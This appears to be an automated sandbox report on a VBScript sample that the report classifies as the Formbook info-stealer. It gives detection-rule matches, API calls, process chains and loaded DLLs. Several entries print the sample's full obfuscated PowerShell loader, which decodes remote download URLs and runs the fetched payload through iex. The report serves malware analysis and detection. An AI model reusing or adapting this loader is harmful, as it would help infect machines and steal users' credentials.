oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_221335C0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132C70 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22134340 NtSetContextThread
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22133010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22133090 NtSetValueKey
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22134650 NtSuspendThread
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132AD0 NtReadFile
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132B60 NtClose
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132BF0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132BE0 NtQueryValueKey
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_221339B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132E80 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132EA0 NtAdjustPrivilegesToken
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132F30 NtCreateSection
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132FB0 NtResumeThread
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132FE0 NtCreateFile
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132C60 NtCreateKey
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132CA0 NtQueryInformationToken
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22133D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132D10 NtMapViewOfSection
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132D30 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22133D70 NtOpenThread
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132DD0 NtDelayExecution
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_22132DF0 NtQuerySystemInformation
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 2216EA12 appears 84 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 2217F290 appears 105 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 22135130 appears 36 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 220EB970 appears 268 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 22147E54 appears 91 times
Source: 6 654398.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6180
Source: unknown | Process created: Commandline size = 6180
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6180
Source: amsi32_6656.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBS@15/8@3/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\spgelseshistories.Hov
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsrzxlfk.3qw.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs"
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'Chefstoles.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6656
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cmdkey.exe, 0000000C.00000002.3466952802.0000000003211000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3357501122.00000000031E4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3466952802.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3466952802.00000000031E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 6 654398.vbs | ReversingLabs: Detection: 18%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
Source: C:\Windows\System32\PING.EXE | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. 
iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. 
iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
Source: C:\Windows\SysWOW64\cmdkey.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. 
iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
Source: C:\Windows\SysWOW64\cmdkey.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
